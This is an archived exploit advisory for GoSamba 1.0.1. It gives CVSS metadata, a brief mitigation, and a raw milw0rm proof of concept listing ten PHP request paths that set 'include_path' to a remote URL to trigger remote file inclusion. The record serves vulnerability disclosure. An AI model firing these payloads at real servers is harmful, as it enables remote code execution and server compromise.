GoSamba 1.0.1 (include_path) Multiple Remote File Inclusion Vulnerabilities

vendor:

GoSamba

by:

milw0rm.com

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: GoSamba

Affected Version From: 1.0.1

Affected Version To: 1.0.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

GoSamba 1.0.1 (include_path) Multiple Remote File Inclusion Vulnerabilities

The GoSamba 1.0.1 software is vulnerable to multiple remote file inclusion vulnerabilities. Attackers can exploit these vulnerabilities by including arbitrary remote files via the 'include_path' parameter in various PHP files.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the software. Additionally, it is advised to validate and sanitize user input before including files.

Source

Exploit-DB raw data:

#################################################################################
#  GoSamba 1.0.1 (include_path) Multiple Remote File Inclusion Vulnerabilities
#  http://mesh.dl.sourceforge.net/sourceforge/gosamba/gosamba.1.0.1.tar.gz
#  POC :
#  /inc_group.php?include_path=http://localhost/scripts/020.txt?
#  /inc_manager.php?include_path=http://localhost/scripts/020.txt?
#  /inc_newgroup.php.php?include_path=http://localhost/scripts/020.txt?
#  /inc_smb_conf.php?include_path=http://localhost/scripts/020.txt?
#  /inc_user.php?include_path=http://localhost/scripts/020.txt?
#  /main.php?include_path=http://localhost/scripts/020.txt?
#  /include/HTML_oben.php?include_path=http://localhost/scripts/020.txt?
#  /include/inc_freigabe.php?include_path=http://localhost/scripts/020.txt?
#  /include/inc_freigabe1.php?include_path=http://localhost/scripts/020.txt?
#  /include/inc_freigabe3.php?include_path=http://localhost/scripts/020.txt?
#################################################################################

# milw0rm.com [2007-10-27]